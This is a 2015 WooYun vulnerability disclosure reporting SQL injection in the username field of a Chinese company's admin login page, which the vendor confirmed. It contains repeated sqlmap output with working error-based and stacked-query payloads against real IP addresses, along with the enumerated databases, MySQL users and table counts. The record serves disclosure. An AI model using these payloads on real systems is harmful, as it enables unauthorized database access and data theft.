当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116582

漏洞标题:美菜核心系统注入一枚

相关厂商:meicai.cn

漏洞作者: 爱上平顶山

提交时间:2015-05-27 22:21

修复时间:2015-07-12 13:10

公开时间:2015-07-12 13:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

呵呵

详细说明:

美菜核心系统

http://119.90.53.100/   美菜管理系统
http://119.90.53.180/ 美菜管理系统


这两个:
http://119.90.53.100/default/checklogin
username 存在POST注入

sqlmap identified the following injection points with a total of 435 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)--
Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)--
Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
available databases [6]:
[*] Commodity
[*] information_schema
[*] mysql
[*] performance_schema
[*] tt
[*] wms_test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)--
Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'yssstp'@'%'
Database: wms_test
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| t_admin_user_power | 3876 |
| t_product_category | 3345 |
| t_product | 2654 |
| t_product_set | 2654 |
| t_stock_log | 1595 |
| t_cargo_space | 1190 |
| t_shop | 702 |
| t_admin_group_power | 438 |
| t_admin_user_log | 399 |
| t_order_log | 255 |
| t_order_product | 167 |
| t_cargospace_log | 146 |
| t_supplier_purchase_product | 76 |
| t_supplier_appointment | 54 |
| t_order | 52 |
| t_supplier_purchase | 52 |
| t_stock | 47 |
| t_supplier | 44 |
| t_supplier_warehouse | 44 |
| t_pallet | 37 |
| t_product_added | 28 |
| t_product_receipt | 27 |
| t_warehouse | 25 |
| t_admin_user_warehouse | 21 |
| t_admin_user_process | 15 |
| t_process_order | 15 |
| t_admin_user | 13 |
| t_process_product | 12 |
| t_message | 11 |
| t_warehouse_aisle | 10 |
| t_order_wave | 9 |
| t_process_product_detail | 9 |
| t_warehouse_area | 9 |
| t_stock_lock_log | 7 |
| t_cargospace_transfer | 5 |
| t_process | 4 |
| t_admin_group | 3 |
| t_cargoowner_warehouse | 3 |
| t_return | 3 |
| t_return_product | 3 |
| t_cargoowner | 2 |
| t_order_deliver | 2 |
| t_order_deliver_detail | 2 |
| t_order_wave_detail | 2 |
| t_product_defective | 2 |
| t_app | 1 |
| t_app_cargoowner | 1 |
| t_cargospace_freeze | 1 |
| t_cargospace_freeze_list | 1 |
| t_inventory | 1 |
| t_order_box | 1 |
+-----------------------------+---------+


ok 不深入 就这样

漏洞证明:

···

修复方案:

···

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-28 13:08

厂商回复:

多谢

最新状态:

暂无